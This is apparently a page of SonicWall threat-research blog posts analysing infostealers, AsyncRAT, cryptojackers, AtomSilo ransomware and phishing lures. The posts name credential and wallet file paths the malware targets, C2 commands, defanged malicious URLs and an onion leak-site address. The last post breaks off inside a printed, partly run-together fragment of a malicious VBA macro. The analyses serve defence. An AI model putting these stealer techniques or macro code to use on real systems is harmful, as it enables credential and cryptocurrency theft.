, , , , ,

Google script being abused for Cryptocurrency fraud

SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use and malicious code can evade detection by anti-malware systems.

Google Script macros are primarily designed to enhance productivity and streamline workflows within Google services. However, threat actors are now exploiting them for fraudulent purposes, finding ways to execute malicious code within the context of legitimate Google applications.

In this case, a PDF file is being circulated, containing a malicious URL that was created using Google Script. Once the user interacts with this URL, they are redirected to the actual fraudulent website.

Fig: PDF File

 

Below shown the response to the malicious URL using Google Script Macro.

Fig: Fiddler capture of malicious Google Script Macro

 

When the URL in the PDF file opens it shows Google’s message that this application was created by another user not by Google when clicked on the webpage it redirects to office[.]proprogramvipt[.]top

Fig: Google script malicious URL

 

After redirection, On this deceptive webpage, user is confronted with a warning message indicating that their account is at risk of deletion due to inactivity. To add a sense of urgency, a countdown timer is displayed, suggesting that the account will be deleted imminently.

In order to prevent the account deletion and purportedly withdraw the funds (which, in reality, are non-existent), user is instructed to sign in.

Fig: Warning for account deletion

 

Upon signing in, user is presented with a prepopulated sign-in page that appears legitimate. The page is carefully designed to create an enticing welcome-back message, which includes displaying the user's Bitcoin balance in both BTC and USD values. This serves as bait to lure user into continuing further with the process.

Fig: Sign-in & welcome message

 

To create an illusion of authenticity, various elements that mimic legitimate features commonly found on cryptocurrency platforms are presented. These elements include:

History: A fabricated transaction history is displayed, showcasing previous transactions to make the platform appear genuine.

User Chat: Fictitious comments and messages from fake users are shown, attempting to simulate user activity and engagement on the platform.

Settings: Users are provided with an option to collect bitcoins, along with the ability to change their password. This is aimed at giving the impression of user control and customization.

News: Fake news articles are presented, falsely claiming updates such as a switch to a new cryptocurrency system, the addition of PayPal payouts, or technical server-related updates. These news pieces aim to instill a sense of credibility and innovation.

All of these elements are carefully designed to create an atmosphere of legitimacy and trust, further deceiving users into believing that the fraudulent platform is genuine and reliable.

 

Fig: News, Settings, Chat & History

 

It shows the current balance in BTC & USD with a button to collect bitcoin bonuses.

 

Fig: Collect BTC Bonuses

 

After clicking the “Collect Bitcoin Bonuses” button it shows a progress bar as if mining is going on the system with fake transaction hashes.

Fig: Fake mining

 

Once the progress bar reaches 100% it shows collected BTC and a get paid button.

 

Fig: BTC collection

 

After clicking get paid it asks for the user’s personal details along with account/card details.

 

Fig: User's details

 

After getting all the details shows forwarding the details to the manager and they have their own chatbot which says details are verified without any validation even if random input is given.

Fig: Chatbot

Then for currency exchange, it redirects to BTC pay & the user has to pay in bitcoin.

 

Fig: BTCPay

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CryptoFraud.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

Indicators of Compromise (IOC):

671ea7c95223fc15b2dbe03bc55acc44d81f0f69c1a3686c9f8db174df3e2710

/by
, , , ,

Unmasking the Dot Net InfoStealer: A Deep Dive into its Techniques

Recently, SonicWall Capture Labs Threat research team discovered a Dot Net stealer malware with enormous capabilities including stealing information from Browsers, VPNs, Steam profiles, installed Apps, Cryptocurrency wallets, Cryptocurrency wallets browsers extensions and sensitive device information. These capabilities provide attackers to obtain valuable information from the victim’s systems that can lead to big financial frauds which can make huge financial losses to victim.

Technical Analysis:

Once user executes the file, Malware starts with creating Mutex using GetCustomAttributes() API. After creating mutex it uses threading by using Task task = Task.Run() to perform stealing activity simultaneously.

 

Browsers Data:

First activity malware does is that it steals information from web browsers. Here malware divides the browsers into 2 categories, 1st is Chromium-based web browsers and 2nd is Gecko-based web browsers. First, it searches for the installed Chromium-based web browsers from the victim’s computer from which he wants to steal information.

Figure 1. Stealing Chromium based browsers information.

Below is the list of Chromium based browsers malware targets:

Chromium Google Opera ChromePlus Iridium 7Star CentBrowser
Chedot Vivaldi Kometa Elements Browser Epic Privacy Browser Microsoft Edge Uran
Sleipnir Citrio Coowon liebao QIP Surf Orbitum Comodo
Amigo Torch Yandex Comod 360Browser Maxthon3 K-Melon
Sputnik Nichrome CocCoc Chromodo Atom Brave

List of Gecko based web browsers that malware targets:

Mozilla Firefox Comodo IceDragon Mozilla SeaMonkey
Pale Moon Waterfox K-Meleon
Thunderbird Cyberfox BlackHaw

After searching for targeted browsers, if malware finds the any of above-mentioned browser directory on the victim’s machine, then steals data from that directory and keep the same in respected folder. For Example, if malware steals History data from Google Chrome and FireFox browser then it creates a folder with the name Histories and keeps the stolen History data of Chrome and Firefox in Google Chrome.txt and Firefox.txt respectively. As shown in below Figure 2.

Figure 2. Stolen browsers History

Here is list of data malware steals from browsers:

  • Login data
  • Cookies
  • Credit card data
  • Bookmarks
  • AutoFill data
  • History

If malware founds any of above-mentioned data, then it keeps its count also in Counter.txt file shown in below Figure 3.

Figure 3. Stolen data from browser with counter

In this malware binary, there is a function DetectCreditCardType() which is called if any Credit Card info found in above mentioned web browsers on the victims’ machine, then it checks that Credit Card number using Regular Expression with major Credit Card Companies which are already hardcoded present in malware as shown in below figure 4.

Figure 4. Credit Card Parsing

Stealing Clipboard Data:

After stealing browsers information, it obtains the clipboard data and keeps in “Clip_BoardText.txt” file and bundles it into a zip file as shown in the below Figure.

Figure 5. Stealing Clipboard Data

Crypto Wallet Extension:

Then this stealer malware extracts information from crypto wallet browser extensions. Right now, the malware only targets 3 browsers OperaOpera GX and Google Chrome. These extension IDs hard coded presents in the file.

Figure 6. Stealing information from Crypto Wallet browser extensions.

Below table shows the targeted crypto wallets with respective browser extension IDs:

Browser extension ID Extension Name
nkbihfbeogaeaoehlefnkodbefgpgknn MetaMask
ibnejdfjmmkpcnlpebklmnkoeoihofec TronLink
fhbohimaelbohpjbbldcngcnapndodjp Binance

Cryptocurrency Wallets:

This stealer not only steals Crypto Wallet Extensions information from browsers but also targets the Cryptocurrencies Wallets installed on victim’s system by looking for text ends with “wallet” or “json” into associated directories mentioned in below table. If any specified Cryptocurrency wallet found on victim’s system, then it reads all the information and bundles into a zip file with folder name “CryptoWallets” along with No. of counts of CryptoWallets in Counter.txt files which is also present in zip file.

Figure 7. Stealing Cryptocurrencies information

Here is the list of Cryptocurrency wallets which malware targets:

Cryptocurrency Name Targeted Directory
Electrum %AppData%\Roaming\Electrum\wallets
Electrum-Dash %AppData%\Roaming\Electrum-DASH\wallets
Ethereum %AppData%\Roaming\Ethereum\keystore
Exodus %AppData%\Roaming\Exodus\exodus.wallet
Atomic %AppData%\Roaming\atomic\Local Storage\leveldb
Jaxx %AppData%\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Coinomi %AppData%\Local\Coinomi\Coinomi\wallets
Guarda %AppData%\Roaming\Guarda\Local Storage\leveldb
Armory %AppData%\Roaming\Armory
Zcash %AppData%\Roaming\Zcash
Bytecoin %AppData%\Roaming\bytecoin

Targeted Apps:

Malware does not stop after stealing Crypto wallets and extensions from browsers, then it looks for specified installed apps from the victim’s machine. Below is list of targeted apps which are also hardcoded in binary. If malware found the specified app on machine, then it creates text file with “AppName_log.txt” and writes all data in it.

Application Name
DynDNS
FileZilla
Foxmail
Pidgin
Telegram

 

Pidgin:

Pidgin defines itself as a chat program that lets you log into accounts on multiple chat networks simultaneously. The credentials targeted by the stealer are located in an XML file containing the account information (accounts.xml), which should be located under the “%ApplicationData%\.purple” directory. As shown in below Figure, After obtaining pidgin data, malware copies it into a text file with name "Pidgin_Log.txt" and bundle into a zip.

Figure 8. Stealing Pidgin data.

Filezilla:

The FileZilla software program is a free-to-use (open source) FTP utility, allowing a user to transfer files from a local computer to a remote computer. This stealer will try to obtain the two files where the FPT client stores its passwords. Below table shows path where files will be located with description.

                         File                        Description
%AppData%\Roaming\FileZilla\recentservers.xml Contains the passwords associated with Site Manager
%AppData%\Roaming\FileZilla\sitemanager.xml Contains the passwords for QuickConnect

 

If malware founds above mentioned files, then XML documents will be examined to locate "Server" elements and extract the "Host," "Port," "User," and "Pass" fields from each instance. “Pass” field will be decoded from Base64.The retrieved information will be saved in “FileZilla_Log.txt” file and bundle in into a zip file.

Figure 9. Stealing FileZilla Credentials

Foxmail:

The stealer targets POP3 accounts and passwords associated with this mailing software. Inside FoxMail's installation directory, there is a file named "Accounts\Account.rec0" where these credentials are stored. The location of the installation directory is obtained from following registry key:

SOFTWARE\\Classes\\Foxmail.url.mailto\\Shell\\open\\command"

Under the "\\Storage" directory, the stealer searches for all directories that match the regular expression "@". It then attempts to locate the "Accounts\Account.rec0" file within these directories. If the file is found, it will be read and parsed to obtain POP3 account details and passwords. After this, malware copy stolen info into "FoxMail_Log.txt" and bundle it into a zip.

 

Telegram:

This stealer tries to steal information from Telegram in 2 ways as shown in below Figure 10. In a first way, it targets to installed Telegram app on victims’ machine by checking %AppData%\Roaming\Telegram Desktop\tdata directory. If the directory found, then collects all the file from that directory then bundle into zip file with the folder name “TelegramFiles/Installed/tdata”. Here malware Bypasses some files while collecting information from both installed Telegram app and Portable Telegram.

 

Below it the list of directories and files which malware bypass:

  • dumps
  • temp
  • user_data
  • user_data#2
  • tdummy
  • emoji
  • modules
  • exe
  • txt
  • .json
  • Dictionaries

In second way, Malware retrieves all running processes by using Process.GetProcesses() method. If it finds a process name starting with “Telegram” then retrieves all the information Bypassing above listed directories and files and put it into a zip file with the name “TelegramFiles/Portable

Figure 10. Stealing Information from Telegram App.

Apart from above mentioned apps, Malware also steals information from Discord App and keep in "Discord/Tokens.txt" and bundle into zip file. Then next it steals information from RDP files if present on victims’ system by searching for .rdp extension.

 

Targeted VPNs (Virtual Private Network):

After targeting Apps from victims’ machine, this stealer malware has the capabilities to steals VPNs information  from victim’s machine.

VPN Name    VPN Directories
NordVPN %APPDATA%\Local\NordVPN
ProtonVPN %APPDATA%\Local\ProtonVPN
OpenVPN %USERPROFILE%\ OpenVPN\config, %APPDATA%\Roaming\OpenVPN\config
KerioVPN %APPDATA%\Roaming\kerio

 

Stealing Steam Credentials:

Steam is a video game digital distribution service that provides automatic updates for various games. It is highly popular among gamers as it allows for multiplayer capabilities.

Figure 11. Stealing Steam ID.

As shown in above Figure 11, stealer reads all lines from “configloginusers.vdf” file and obtain steam ID. This obtained ID is then written into “SteamID_Log.txt” which will be stored in Steam folder.

Figure 12. Stealing Steam files.

As shown in above Figure 12, this stealer gets the Steam location of the victim’s system by targeting "SOFTWARE\\Wow6432Node\\Valve\\Steam" and "Software\\Valve\\Steam" directories using GetLocationSteam(). If Steam directory is found, then it copies all the files into “Steam” folder and escapes files which having “. crash” extension. After this, stealer also grabs config information and stores it into “Steam/Config” directory.

 

C2 Communication:

Figure 13. Uploading stolen data to C2

As shown in above Figure, malware adds header by using “DateTime.Now.Ticks()” which is used to Get the number of ticks that represent the date and time of this instance. After adding header malware bundles stolen data into a zip file and sends it to C2 server (hxxps://es-megadom.com) which is hardcode present in binary using the POST request method. As now writing this blog, while uploading data to C2 malware throwing Exception because it is down and terminating by returning false.

 

Exfiltration:

After stealing all important information from victim's machine the last step malware does is, it bundles all this information into folder with name like “c33f028dee6e06ed_[mr0001]” which is obtained by performing some operation on victims UserName and MachineName and contacting “_[mr0001]” string as shown in below Figure.

Figure 14. Exfiltration File

ProcessInfo_Log.txt:

As name suggests, ProcessInfo_Log.txt file contains All running processes with format like:

  • Process Name:
  • Process Tittle:
  • Process Path:

Figure 15. Obtaining running processes

Information.html file:

Information.html file contains all the following information of victim’s machine and all running process followed by process ID.

  1. Operating system
  2. Registered user
  3. Windows Product Code
  4. Computer name
  5. Logical processes
  6. System directory
  7. Central Processing Unit (CPU)
  8. Processor ID
  9. Screen resolution
  10. BIOS version
  11. Physical memory
  12. Memory type
  13. Video card
  14. Computer model
  15. Computer model manufacturerFigure 16. Stolen Systems information inside Information.html file

List of WMIQUERY used by malware to obtain above information from victims’ system.

  • root\\CIMV2", "SELECT * FROM Win32_OperatingSystem
  • root\\CIMV2", "SELECT * FROM Win32_Processor
  • root\\CIMV2", "SELECT * FROM Win32_DesktopMonitor
  • root\\CIMV2", "SELECT * FROM Win32_BIOS
  • root\\SecurityCenter2", "SELECT * FROM AntiVirusProduct
  • root\\SecurityCenter2", "SELECT * FROM FirewallProduct
  • root\\CIMV2", "SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
  • root\\CIMV2", "SELECT * FROM Win32_PhysicalMemory
  • root\\CIMV2", "SELECT * FROM Win32_VideoController
  • root\\CIMV2", "SELECT * FROM Win32_ComputerSystem

 

Apart from all of this, malware has some additional capabilities like Taking Screenshots, Doing AntiVM checks and country check. In this sample malware author not using above mention functionalities. But in future it may use to make analysis of this binary more difficult and obtaining some additional information from victim’s machine.

Figure 17. AntiVM Code present in malware binary.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: Passwordstealer.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

/by
, ,

AsyncRAT variant includes CryptoStealer capabilites

AsyncRAT is a well known malware and widely active since last few years. However, the old variant of AysncRAT is completely destructive, in the latest variant the malware has advances its capabilities by including additional commands support from C2, clipper module, cryptostealer module, keylogger module and ability to prevent system from going to sleep. SonicWall RTDMI detects a JavaScript file which downloads and executes fileless AsyncRAT on the victim's machine.

JavaScript

The JavaScript contains garbage comments and keeps the name of the variables larger, to make the code illegible. It downloads a VBScript from a compromised website "h[t][t]ps://dnacapitalgroup.com/wp-includes/images/information.txt" to "%Temp%\VB", using the Windows utility tool BITSAdmin. The VBScript is launched using Windows Scripting Host by specifying the engine type as "VBScript" for executing script. Windows Script Host usually associates the script engine type based on the script extensions but the malware downloads and executes the VBScript without any extension that makes the requirement of providing the engine information explicitly:

 

The tiny and obfuscated VBScript launches a PowerShell script which further downloads and launches next layer PowerShell script:

 

PowerShell Script

The PowerShell script drops a batch script, a VBScript and 2 PowerShell scripts into "C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV". This PowerShell script distributes the tasks among these dropped scripts to thwart detection from the security vendors. The PowerShell script starts the next layer PowerShell script TZOQCBINLOLHJQAPYIDAJV.ps1:

  • TZOQCBINLOLHJQAPYIDAJV.bat
  • TZOQCBINLOLHJQAPYIDAJV.ps1
  • TZOQCBINLOLHJQAPYIDAJV.vbs
  • YPSPPQWKQDKPVWZHQCIIQZ.ps1

TZOQCBINLOLHJQAPYIDAJV.ps1

The PowerShell script schedules a task to execute the VBScript "C:\ProgramData\TZOQCBINLOLHJQAPYIDAJV.vbs" after every 3 minutes:

TZOQCBINLOLHJQAPYIDAJV.vbs

The obfuscated VBScript launches TZOQCBINLOLHJQAPYIDAJV.bat script:

TZOQCBINLOLHJQAPYIDAJV.bat

The batch script hijacks the Common Object Model (COM) server by making the registry entry "Computer\HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32" to a not existing DLL and bypasses Antimalware Scan Interface (AMSI) scanning for the unpatched amsi.dll. The batch script executes the next layer PowerShell script YPSPPQWKQDKPVWZHQCIIQZ.ps1:

YPSPPQWKQDKPVWZHQCIIQZ.ps1

The PowerShell script contains a loader and AsyncRAT binary bytes, encrypted using TripleDES algorithm. The PowerShell script invokes method "C" from the loader binary by passing a file path for process hollowing and AsyncRAT binary's bytes array. The loader binary does the process hollowing in process "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" to execute the AsyncRAT on the victim's machine. AMSI scanning for loader and AsyncRAT bytes buffers does not work, in unfixed variants of amsi.dll as the malware have hijacked the COM server:

 

AsyncRAT

The old variant of AsyncRAT sends the victim's information to the C2 server, receives and executes commands. The AysncRAT is capable of receiving and executing plugin on the victim's machine. The latest variant keeps the old functionalities and additionally we have observed below enhancements:

  • CryptoStealer module
  • Enables Clipper module
  • Enables offline keylogger
  • Threat actor's digital wallet addresses
  • Updated group name
  • Updated hosts and ports

The latest variant uses the same mutex name, used in the old variants "AsyncMutex_6SI8OkPnk". To prevent detection in sandbox, the malware delays the execution by sleeping 1000 milliseconds, 3 times in a loop and then decrypts configuration information using AES decryption and initializes the variables:

 

The malware contains code to check for anti analysis, anti VM, anti sandbox and make persistence entry but that is disabled using the flag values, similarly to the old variant. In this variant, the malware enables flag for offline Lime keylogger which logs the key strokes into "%temp%\log.tmp". The malware keeps the system in active state and prevents it from going to sleep, using  Windows API SetThreadExecutionState by enabling flag values ES_CONTINUOUS, ES_SYSTEM_REQUIRED and ES_DISPLAY_REQUIRED:

 

The major change in this variant that we have observed, is inclusion of Clipper module which intends to steal crypto currencies. The Clipper module looks currency addressed using regular expression in the clipboard data which includes wallet addresses of Bitcoin, Ethereum and Tether, and replaces them with malware's wallet addresses:

 

C2 Communication

The malware selects a random host and port from the list of host domains/IPs and ports respectively, and tries to connect with it. If the connection to the C2 server fails, the malware tries the next random combination, after a sleep of 5000 milliseconds. Once the connection with C2 sever is established, malware sends below information from the victim's machine:

  • Packet type as "ClientInfo"
  • Hardware ID
  • Username
  • Operating System info
  • Execution path
  • Version
  • Execution mode (Admin | User)
  • Active GUI window name
  • Antivirus
  • Chrome MetaMask extension
  • Digital wallet information
    • Bitcoin core
    • Exodus
    • Atomic
    • Electrum
    • Coinomi
    • Ledger
  • Chrome Two Factor Authenticator (2FA) extension
  • Bitcoin core information
  • Exodus information
  • Executable time
  • Pong as empty string
  • Group as "newmekha"
  • Last input time

 

The malware creates 3 threads, first thread keeps sending ping messages to ensure the C2 server that the client is alive, second thread counts the time interval for the connection and third thread reads data from the C2 server.

Commands

This variant has increased the supported commands compare to the old variants. The malware receives data in an encoded and compressed message format which is decoded to get the command. Based on the received command, the message may include additional data (eg. plugin bytes, killing processes names and URL to download payload etc.). The malware supports below commands and after executing the command, the result is sent back to the C2 server.

  • ResetScale
    • Overrides Dots Per Inch (DPI) scaling using Windows API SystemParametersInfoA and sends back "Reset Scale succeeded!".
  • passload
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • killps
    • The command includes names of comma separated processes which are terminated by the malware.
  • plugin
    • The malware receives the plugin command along with the plugin hash value. The malware checks if the plugin is already installed on the victim’s machine by looking the hash value into registry “HKEY_CURRENT_USER\Software\<HWID>“. If the plugin is already installed on the victim’s machine, the malware executes the plugin in memory else the malware sends the plugin hash value by setting the packet type to “sendPlugin“:
  • savePlugin
    • The malware receives the “savePlugin” command along with the plugin bytes and its hash value. The malware saves the compressed plugin bytes into the registry entry “HKEY_CURRENT_USER\Software\<HWID>” with value name to hash of the plugin. The plugin bytes are decompressed and invoked by the malware.
  • getscreen
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • uacoff
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • DicordTokens
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • weburl
    • The malware receives an URL, to download a payload along with the commands. The payload from the URL is downloaded into a temporary file and executed.
  • Net35
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • pong
    • The malware has registered a timer which keeps increasing the interval value. Once the malware receives pong command, the interval value is sent to the C&C server by setting the packet type to “pong”.
  • Avast
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • WDExclusion
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • KillProxy
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • gettxt
    • The malware sends the clipboard text to the C2 server.
  • klget
    • The malware sends the stolen keystrokes file which is created by the Lime keylogger.
  • backproxy
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.
  • WebBrowserPass
    • The malware receives plugin bytes along with the command which is loaded in the memory and "PL" method from the plugin is invoked. The Plugin result is sent back to the C2 server.

 

Unavailability of the archive file in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs at the time of writing this blog indicates its uniqueness and limited distribution:

Evidence of the detection by RTDMI(tm) engine can be seen below in the Capture ATP report for this file:

/by
, , , , , ,

A look at TeamTNT's latest variant being actively used in the wild

The SonicWall Capture Labs threat research team analyzed the latest cryptomining and infostealing Trojan from a well-known malware group called TeamTNT. They are known to target vulnerable *nix systems and would deploy cryptominer and a myriad of other tools for reconnaissance and infostealing.

Infection Cycle:

The sample comes as a bash script. To establish a clean slate, upon execution it calls a function that will find, kill and remove all running cryptomining services.

Also while getting rid of cryptominers, it adds another bash script as a lock file which when executed will echo and read "Forbidden Action!!! TeamTNT is watching you."

It then sets up its own cryptominer by downloading and installing XMrig, an open source Monero miner.

Upon setup and execution of the cryptominer, a TeamTNT-branded greeting is shown.

It then runs another function called makesshaxx to set up SSH key which then allows TeamTNT to securely access the victim machine over an unsecured network.

It then deploys an open source rootkit called Diamorphine which it uses to hide itself.

It begins as a base64 encoded tar file.

Which is then decoded, decompressed, built and installed.

And then finally executed by running the command "insmod diamorphine.ko"

It also locks up the system and ensures full control by deleting cronjobs and locking cron.

It also redirects standard output and errors to null when the victim tries to shutdown or reboot the system.

And finally it has a function that uses another open source tool called, punk.py which is an SSH post-exploitation tool that is used to collect usernames, ssh keys and known hosts from a unix system, then tries to connect via ssh to all the combinations found.

The python script is hidden as a base64 encoded value.

But once decoded reveals the punk.py tool.

Sonicwall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.AIY (Trojan)
  • GAV: XMRig.XMR_13 (Trojan)

This threat is also detected by Sonicwall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

/by
,

Open source stealer malware, Mercurial, for "educational purposes" spotted in the wild

The SonicWall Capture Labs threat research team has come across data theft malware derived from the Mercurial password stealer family.  This malware is open source and readily available on github for "educational purposes only".  Because it is open source, it can be easily customized and deployed with little programming expertise necessary.  The malware is written in C# and is trivial to decompile.

 

Infection Cycle:

 

Upon infection, the malware copies itself to %APPDATA\Local\Temp\.  It also adds itself to the registry so that it is started after each reboot:

 

It scans the system for browser profile information:

 

In addition to searching for browser data, it also searches for Minecraft launch profile files and Discord Level DB files:

 

It contains a very basic level of antidebugging:

 

Any information that is gathered from the system is sent via an HTTP POST request to the operator:

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Blitzed.N (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

/by
, , , , , ,

Cryptojackers target servers running Alibaba Cloud

This week the Sonicwall Capture Labs Research team analyzed malware samples that appear to be targeting one of the popular cloud computing platforms, Alibaba Cloud (Aliyun). Alibaba Cloud might not be the first name that comes to mind when you think of cloud computing service providers. However, it is the 4th largest cloud provider globally behind Amazon Web Services, Microsoft Azure and Google Cloud, thus a very appealing target to cybercriminals. The end goal of this malware is to use the victim machine for mining cryptocurrencies.

Infection cycle:

The malware arrives as a bash script. Upon execution it disables Alibaba cloud monitoring agents and cloud assistant service. These services allow for monitoring resources and applications and set alarms for difference scenarios. Disabling these services lets the malware execute without possibly notifying the owner of the victim machine when certain metrics or rules have been triggered.

It then proceeds to disable other processes and cryptomining services that can compete with the CPU resources. These commands are within a function named “kill_miner_proc().”

TeamTNT and Kinsing are two of the top threat groups dominating the cryptojacking arena by infiltrating vulnerable servers for the purpose of running cryptominers.  This malware has a special function named “fuckyou()” specifically targeting processes and other files known to be used by the aforementioned cybercriminal groups effectively disabling them if present in the infected system. This establishes a clean slate for when this malware finally runs its cryptominer.

It then proceeds to download XMRig miner and executes it.

To maintain persistence it deletes the current cronjob and adds the miner process and a copy of itself into cron.

And the entire infection cycle continues.

It is unlikely that the owner of a compromised server will notice the issue right away. Unlike with ransomware, where the victim is made aware of the infection so the cybercriminal can collect its dues, attacks such as this can quietly run in the background, silently profit without demanding a ransom and persist for a long period of time.

Sonicwall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.AIY (Trojan)
  • GAV: XMRig.XMR_13 (Trojan)

This threat is also detected by Sonicwall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

/by
, , , ,

AtomSilo hits large Brazilian company in $1M double extortion scheme

The SonicWall Capture Labs threat research team has observed a continued increase in ransomware used in double extortion schemes.  The operators of ransomware known as AtomSilo have recently infiltrated a Brazilian pharmaceutical company.  The malware installed has encrypted their files and obtained 900GB of very sensitive scientific data and even immigration and contact information of its employees.  A $500,000 ransom is offered for 48 hours.  After this, the ransom is increased to $1M in Bitcoin.  Failure to pay will result in the sensitive data being released to the public.

 

Infection Cycle:

 

Upon infection of the ransomware component, files on the system are encrypted.  Each encrypted file is given a ".ATOMSILO" file extension.

After encryption, the following message is brought up on the infected machine's desktop:

 

The following files are dropped on to the system:

  • README-FILE-{machine name}-{random 10 digit number}.hta (in directories with encrypted files)

 

The tOr web address (http://mhdehvkomeabau7gsetnsrhkfign4jgnx3wajth5yb5h6kvzbd72wlqd.onion) leads to the following page that is hosted by the operators:

 

The "LIST LEAK" button shows a company that is in the process of being extorted by the operators:

 

The "GO TO POST" button brings up a page that shows a summary of the data that has been obtained by the attackers:

 

This page is very long and contains samples of the sensitive data that has been obtained:

 

The leak also includes company financial data and employee contact information:

 

We reached out to the email address (arvato@atomsilo.com) provided in the ransom note and received the following response:

 

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: AtomSilo.A (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

 

/by
, , , , ,

Multistage infostealer wants your Discord, Telegram, Steam Account Info

The SonicWall Capture Labs Threat Research team has analyzed a multi-stage infostealer. If available on the victim’s machine, this Trojan steals various cryptocurrency data, credit card info, ftp server info and credentials on Discord, Telegram, Pidgin, Steam, NordVPN and Authy (2FA) accounts. It also steals the browser history and even takes a screenshot of the desktop.

Infection Cycle:

The malware infection starts with a malicious Microsoft Excel spreadsheet file that has an embedded visual basic (VBA) macro that when executed will download a Trojan downloader.

This downloader then drops a batch file which then runs a slew of commands.

It has the functionality to add a user to the active directory.

It also  invokes powershell to run a script which downloads the main infostealer Trojan. The powershell script is encoded that when decoded shows the download URL.

To ensure persistence, it adds the infostealer Trojan to startup.

All these components files are deleted after the main infostealer has been downloaded.

Once the main infostealer is executed it creates a directory under the %Temp% folder with a random name where it logs all stolen information.

It creates a sqlite file which has the information on credit card available on the system.

It saves a png file of the screenshot of the victim’s desktop.

It also creates a file which has the list of all recently visited websites and another file which has the list of the rest of stolen information on various cryptocurrencies, popular chat app accounts like Discord, Pidgin and Telegram, VPN and FTP servers, as well as account info on popular cloud-based gaming library, like Steam.

All these log files are then deleted once they have been sent out to remote server.

During analysis we noted that this “Collector Project” (which was one of the logs’ title) indicated that this is BETA BUILD v1.11 which might suggest that this has been an ongoing project for these cybercriminals and that we can expect to see this again and other variants in the future with more features and capabilities.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Panda.B (Trojan)
  • GAV: Panda.K (Trojan)
  • GAV: Panda.STL (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

 

/by
, , , ,

Anubis infostealer wants your cryptocurrency wallet

This week the Sonicwall Capture Labs research team analyzed an infostealing Trojan that is a mash up of another infostealer Trojan and a ransomware. This Trojan, is called Anubis but borrowed most of its code from another Trojan named Loki which is popularly sold in the underground market.

Infection Cycle

This Trojan uses the following icon:

Upon execution, it proceeds with perusing through the system and start stealing data, taking screenshots, etc. It then creates a random folder within the %temp% directory where it stores log files of stolen data.

This stolen data is then sent to a remote server.

During static analysis, it was noted that it had references to “Loki” within its strings as evidence of it borrowing code from this other infostealer Trojan. After all, Loki is a commodity malware commonly sold in underground sites.

This Trojan functions much like Loki and comes after the victim’s system information, browser data, credentials, credit card details and cryptocurrency wallets.

Coincidentally, during analysis we noticed references to ransomware functionality within its strings although this was not evident during runtime.

Apart from being sold underground, Lokibot has been known to be distributed via spam emails and Anubis, will highly be likely to be similarly distributed.

Always be vigilant and cautious when installing software programs particularly if you are not certain of the source.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Anubis.ST (Trojan)
  • GAV: VHDLocker.RSM (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

/by
, , , , ,

Latest variant v1.5 of racoon stealer used in COVID-19 phishing campaign

SonicWall Capture Labs Threat Research team has come across a new variant of Raccoon stealer (V1.5) that was used in a malicious COVID-19 campaign. While we wear masks to defend against coronavirus, a bandit masked raccoon seeks to take advantage of the coronavirus outbreak.

Infection Cycle

As with several other attacks, this campaign starts with a phishing email pretending to contain information on how to deal with the outbreak of Covid-19. To find more detail, it encourages the user to open the attached file "COVID-19 stop.zip".

The attached Zip archive has a Microsoft document in Office Open XML format. On opening the document, the below text is shown, attempting to deceive the user to enable editing and allow content to update windows to correct the application.

This document contains embedded malicious macro code that executes when macro content is enabled. These VB macros are password-protected, in an effort to bypass detection and thwart analysis.

VBAProject has the following modules in it.

VBA Module creates folder named NTcore and batch file named easy.cmd inside NTcore.
Attribute VB_Name = "Module1"
Public obj3
Public Sub App_Hard_Wait_DoEvents(dblSeconds As Double)
If dblSeconds = 0 Then Exit Sub
Dim varStart As Variant
varStart = Timer
Do While Timer < (varStart + dblSeconds)DoEvents
LoopResolution6
With Application
.ScreenUpdating = False'Loop Through open documents
Do Until .Documents.Count = 0
'Close no saveResolution8
.Documents(1).Close SaveChanges:=wdDoNotSaveChanges
Loop'Quit Word no save
.Quit SaveChanges:=wdDoNotSaveChanges
End WithEnd SubSub SetIndentLevel()
